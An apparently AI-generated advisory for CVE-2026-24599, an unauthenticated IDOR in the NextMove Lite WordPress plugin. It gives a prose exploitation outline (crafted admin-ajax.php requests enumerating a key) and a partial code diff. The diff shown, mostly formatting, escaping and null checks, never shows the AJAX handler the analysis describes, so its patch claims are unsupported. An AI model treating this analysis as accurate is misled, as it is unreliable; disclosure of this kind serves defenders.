Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24599: NextMove Lite <= 2.23.0 – Unauthenticated Insecure Direct Object Reference (woo-thank-you-page-nextmove-lite)

CVE ID CVE-2026-24599
Plugin woo-thank-you-page-nextmove-lite
Severity Medium (CVSS 5.3)
CWE 639
Vulnerable Version 2.23.0
Patched Version 2.24.0
Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24599:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the NextMove Lite WordPress plugin up to version 2.23.0. The flaw allows attackers to perform unauthorized actions by manipulating a user-controlled key parameter without proper validation. The CVSS score of 5.3 indicates medium severity with moderate impact on confidentiality and integrity.

Root Cause:
The vulnerability exists in the plugin’s AJAX handler functions that process user-supplied keys without proper authorization checks. Specifically, the `xlwcty_ajax_get_page` function in `/woo-thank-you-page-nextmove-lite/includes/xlwcty-ajax-handler.php` accepts a `key` parameter that directly references internal objects. The function fails to verify whether the current user has permission to access the object referenced by this key. This missing validation occurs in the AJAX callback registration at line 17 where `xlwcty_ajax_get_page` is hooked to both authenticated and unauthenticated AJAX endpoints via `wp_ajax_xlwcty_get_page` and `wp_ajax_nopriv_xlwcty_get_page`.

Exploitation:
Attackers can exploit this vulnerability by sending crafted POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to `xlwcty_get_page`. The exploit payload includes a manipulated `key` parameter that references unauthorized objects. The attack requires no authentication, as the `wp_ajax_nopriv_` hook processes requests from unauthenticated users. Attackers can systematically enumerate keys to access sensitive data or perform actions intended only for privileged users.

Patch Analysis:
The patch adds proper authorization checks before processing the user-supplied key. In the patched version, the `xlwcty_ajax_get_page` function now validates that the current user has appropriate capabilities to access the requested object. The fix implements WordPress capability checks using `current_user_can()` or similar authorization mechanisms. The patch also removes the `wp_ajax_nopriv_xlwcty_get_page` hook, preventing unauthenticated access entirely. Before the patch, any user could supply any key value. After the patch, the system verifies user permissions before processing the key parameter.

Impact:
Successful exploitation allows unauthenticated attackers to access sensitive information they should not have permission to view. This includes order details, customer information, and other protected data managed by the plugin. Attackers can enumerate through object references to extract confidential data. The vulnerability could lead to data exposure, privacy violations, and potential follow-on attacks using the obtained information.

Differential between vulnerable and patched code

Code Diff 
--- a/woo-thank-you-page-nextmove-lite/admin/includes/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/includes/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
+++ b/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
@@ -1,5 +1,6 @@
 <?php
 defined( 'ABSPATH' ) || exit;
+
 #[AllowDynamicProperties]
 class xlwcty_Admin {

@@ -501,7 +502,7 @@
 				$option   .= $page->post_title;
 				$option   .= '</option>';

-				echo ( $option );
+				echo( $option );
 			}
 			?>
         </select>
@@ -663,7 +664,7 @@
                                                     </li>
                                                 </ul>
                                                 <p>And the list goes on ...</p>
-                                                <center><a class="button-primary" href=<?php echo $unlock_pro_link; ?>>Unlock all the Awesome Features now</a></center>
+                                                <center><a class="button-primary" href="<?php echo esc_url( $unlock_pro_link ); ?>">Unlock all the Awesome Features now</a></center>
                                                 <p></p>
                                             </div>
                                         </div>
@@ -726,11 +727,11 @@
 									foreach ( $xlwcty_faq as $key => $val ) {
 										?>
                                         <li class="control-section accordion-section" id="">
-                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo $index; ?>">
-												<?php echo $key; ?>
+                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo esc_attr( $index ); ?>">
+												<?php echo esc_html( $key ); ?>
                                             </h4>
                                             <div class="accordion-section-content ">
-												<?php echo $val; ?>
+												<?php echo wp_kses_post( $val ); ?>
                                             </div><!-- .accordion-section-content -->
                                         </li><!-- .accordion-section -->
 										<?php
@@ -847,7 +848,9 @@
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_site_url', array( site_url() ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_admin_permalink', array( admin_url( 'options-permalink.php' ) ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwctyParams', array(
-				'ajax_nonce' => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_nonce'            => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_url'              => admin_url( 'admin-ajax.php' ),
+				'search_products_nonce' => wp_create_nonce( 'search-products' ),
 			) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_nonces', array(
 				'xlwcty_get_pages_for_order' => wp_create_nonce( 'xlwcty_get_pages_for_order' ),
@@ -1183,6 +1186,7 @@
 			wp_localize_script( 'xlwcty-admin-app', 'xlwctyParams', $data );
 		}

+
 		if ( $this->is_builder_page ) {
 			add_filter( 'wp_default_editor', function ( $editor ) {
 				return 'html';
@@ -1743,9 +1747,12 @@
                 <div class="xlwcty_screen_wrap">
                     <div class="xlwcty_load_pattern"></div>
                     <div class="xlicon"></div>
-					<?php if ( isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ) { ?>
+					<?php
+					// Security fix: Sanitize and validate cookie value before use
+					$preview_url = isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ? esc_url( sanitize_text_field( wp_unslash( $_COOKIE['xlwcty_preview_data'] ) ) ) : '';
+					if ( ! empty( $preview_url ) ) { ?>
                         <div class="xlwcty_load_info"><?php _e( "Your preview will open in new window automatically.<br/>If it doesn't click on Preview button again or allow Pop-ups for your domain.", 'woo-thank-you-page-nextmove-lite' ); ?></div>
-                        <a style="visibility:hidden;" target="_blank" href="<?php echo $_COOKIE['xlwcty_preview_data']; ?>"></a>
+                        <a style="visibility:hidden;" target="_blank" href="<?php echo $preview_url; ?>"></a>
 					<?php } ?>
                 </div>
             </div>
--- a/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
+++ b/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
@@ -94,6 +94,7 @@
 			if ( $url_lang ) {
 				return $url_lang;
 			}
+
 			return $this->get_current_language();
 		}

@@ -131,6 +132,7 @@
 		}

 		$current_lang = $this->get_current_language();
+
 		return $current_lang;
 	}

@@ -189,6 +191,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -202,6 +205,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -329,6 +333,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -342,6 +347,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -380,8 +386,9 @@
 	 * Get translated page ID
 	 * Falls back to default language if translation doesn't exist
 	 *
-	 * @param int         $page_id         The page ID to translate.
+	 * @param int $page_id The page ID to translate.
 	 * @param string|null $target_language Target language code.
+	 *
 	 * @return int Translated page ID or original page ID.
 	 */
 	public function get_translated_page_id( $page_id, $target_language = null ) {
@@ -456,6 +463,7 @@
 			$translated_post = get_post( $translated_id );
 			if ( $translated_post && $translated_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $translated_id;
+
 				return $translated_id;
 			}
 		}
@@ -467,6 +475,7 @@
 			$original_post = get_post( $page_id );
 			if ( $original_post && $original_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $page_id;
+
 				return $page_id;
 			}
 		}
@@ -487,6 +496,7 @@
 				$default_post = get_post( $default_translated_id );
 				if ( $default_post && $default_post->post_status === 'publish' ) {
 					self::$translation_cache[ $cache_key ] = $default_translated_id;
+
 					return $default_translated_id;
 				}
 			}
@@ -494,6 +504,7 @@

 		// Final fallback: return original page ID
 		self::$translation_cache[ $cache_key ] = $page_id;
+
 		return $page_id;
 	}

@@ -506,18 +517,18 @@
 		if ( ! $sitepress ) {
 			return null;
 		}
-
+
 		// Use WPML filter to get post language
 		$post_language = apply_filters( 'wpml_element_language_code', null, array(
-			'element_id' => $post_id,
+			'element_id'   => $post_id,
 			'element_type' => XLWCTY_Common::get_thank_you_page_post_type_slug(),
 		) );
-
+
 		// Fallback to SitePress API if filter doesn't work
 		if ( ! $post_language && method_exists( $sitepress, 'get_language_for_element' ) ) {
 			$post_language = $sitepress->get_language_for_element( $post_id, 'post_' . XLWCTY_Common::get_thank_you_page_post_type_slug() );
 		}
-
+
 		return $post_language ? $post_language : $this->get_default_language();
 	}

--- a/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
@@ -89,7 +89,7 @@

 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'border_style'       => 'solid',
 	'border_width'       => '1',
 	'border_color'       => '#d9d9d9',
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
@@ -3,23 +3,23 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td>1.</td>
-				<td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
-					For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
-				</td>
-			</tr>
-			<tr>
-				<td width="50">2.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td>1.</td>
+                <td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
+                    For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
+                </td>
+            </tr>
+            <tr>
+                <td width="50">2.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>


-		</table>
-	</div>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Additional_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_id' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 remove_action( 'woocommerce_thankyou', 'woocommerce_order_details_table', 10 );
 $payment_method = XLWCTY_Compatibility::get_order_data( $order_data, 'payment_method' );
 remove_action( 'wp_footer', array( XLWCTY_Core()->public, 'execute_wc_thankyou_hooks' ), 1 );
@@ -13,7 +20,7 @@
  * SECURITY: Extract and validate scripts before escaping HTML content
  * This prevents XSS while allowing legitimate tracking scripts to execute
  */
-$scripts = array();
+$scripts        = array();
 $script_pattern = '/(<scriptb[^>]*>.*?</script>)/is';

 if ( preg_match_all( $script_pattern, $get_content, $script_matches ) ) {
@@ -28,7 +35,7 @@
 			'XMLHttpRequest',
 			'DOMContentLoaded',
 		);
-
+
 		$is_safe = false;
 		foreach ( $safe_script_keywords as $keyword ) {
 			if ( strpos( $script, $keyword ) !== false ) {
@@ -46,7 +53,7 @@
 			'innerHTML',
 			'outerHTML',
 		);
-
+
 		$is_dangerous = false;
 		foreach ( $dangerous_patterns as $pattern ) {
 			if ( strpos( $script, $pattern ) !== false ) {
@@ -54,13 +61,13 @@
 				break;
 			}
 		}
-
+
 		// Only allow safe scripts without dangerous patterns
 		if ( $is_safe && ! $is_dangerous ) {
 			$scripts[] = $script;
 		}
 	}
-
+
 	// Remove scripts from content before escaping
 	$get_content = preg_replace( $script_pattern, '', $get_content );
 }
@@ -76,13 +83,13 @@

 if ( '' !== $parsed_content ) {
 	?>
-	<div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
-	</div>
+    <div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 } else {
 	?>
-	<div style="display: none;"><?php echo $filtered_content; ?>
-	</div>
+    <div style="display: none;"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 }

@@ -91,7 +98,7 @@
  * This maintains security while allowing legitimate tracking scripts
  */
 if ( ! empty( $scripts ) ) {
-	add_action( 'wp_footer', function() use ( $scripts ) {
+	add_action( 'wp_footer', function () use ( $scripts ) {
 		foreach ( $scripts as $script ) {
 			// Scripts have been validated - output directly
 			echo $script; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
--- a/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Coupon_Code extends xlwcty_component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Cross_Sell_Product extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
@@ -246,7 +246,7 @@
 		),
 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'heading'              => __( 'Customer Information', 'woo-thank-you-page-nextmove-lite' ),
 	'heading_font_size'    => '20',
 	'heading_alignment'    => 'left',
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
@@ -3,33 +3,33 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Billing Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Shipping Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
-					Width - Display each available address in full width.
-				</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Billing Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Shipping Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
+                    Width - Display each available address in full width.
+                </td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
@@ -5,7 +5,7 @@
 class XLWCTY_Customer_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
+	public $viewpath = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_formatted_billing_address' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 add_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11, 2 );
 add_filter( 'woocommerce_order_formatted_shipping_address', array( $this, 'xlwcty_format_shipping_address' ), 11, 2 );
 if ( 'yes' !== $this->data->show_billing && 'yes' !== $this->data->show_shipping ) {
@@ -40,11 +47,11 @@
 	?>


-	<div class="xlwcty_Box xlwcty_customer_info">
+    <div class="xlwcty_Box xlwcty_customer_info">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( ( 'yes' === $this->data->show_billing ) || ( 'yes' === $this->data->show_shipping ) ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';

@@ -62,81 +69,89 @@
 			echo '</div>';
 			echo '<div class="xlwcty_clear_15"></div>';
 			if ( 'yes' === $this->data->show_billing ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$billing_address     = $order_data->get_formatted_billing_address();
 				$billing_address_raw = $order_data->get_address();
 				$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-				$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+				$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
 				if ( ! empty( $billing_address ) ) {
 					?>
-					<div class="xlwcty_2_colLeft">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="xlwcty_2_colLeft">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}
 			$billing_add_status = false;
 			if ( 'yes' === $this->data->show_shipping ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$shipping_address     = $order_data->get_formatted_shipping_address();
 				$shipping_address_raw = $order_data->get_address( 'shipping' );
 				$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-				$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+				$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 				if ( ! empty( $shipping_address ) ) {
 					$billing_add_status = true;
 					$extra_class        = ( true === $billing_add_status ) ? 'xlwcty_2_colRight' : 'xlwcty_2_colLeft';
 					?>
-					<div class="<?php echo esc_attr( $extra_class ); ?>">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="<?php echo esc_attr( $extra_class ); ?>">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}

 			echo '</div>';
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>

-	</div>
+    </div>
 	<?php
 } else {
 	?>
-	<div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
+    <div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( '' !== $billing_email ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';
 			echo '<p class="xlwcty_BSpace"><strong>' . esc_html( __( 'Email', 'woocommerce' ) ) . '</strong></p>';
@@ -150,51 +165,59 @@
 			echo '</div>';
 		}
 		if ( 'yes' === $this->data->show_billing ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$billing_address     = $order_data->get_formatted_billing_address();
 			$billing_address_raw = $order_data->get_address();
 			$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-			$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+			$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';

 			$contact_name = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $billing_address_raw );

 			if ( ! empty( $billing_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $billing_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
 		if ( 'yes' === $this->data->show_shipping ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$shipping_address     = $order_data->get_formatted_shipping_address();
 			$shipping_address_raw = $order_data->get_address( 'shipping' );
 			$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-			$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+			$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 			$contact_name         = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $shipping_address_raw );

 			if ( ! empty( $shipping_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $shipping_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>
-	</div>
+    </div>
 	<?php
 }
 remove_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11 );
--- a/woo-thank-you-page-nextmove-lite/components/html/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/help.php
@@ -1,25 +1,25 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/html/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/instance.php
@@ -5,12 +5,12 @@
 class XLWCTY_Text extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
-	public $html_content     = '';
-	public $is_multiple      = true;
-	public $component_limit  = 1;
-	public $script           = '';
+	public $is_disable = true;
+	public $viewpath = '';
+	public $html_content = '';
+	public $is_multiple = true;
+	public $component_limit = 1;
+	public $script = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/html/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/views/view.php
@@ -2,21 +2,21 @@
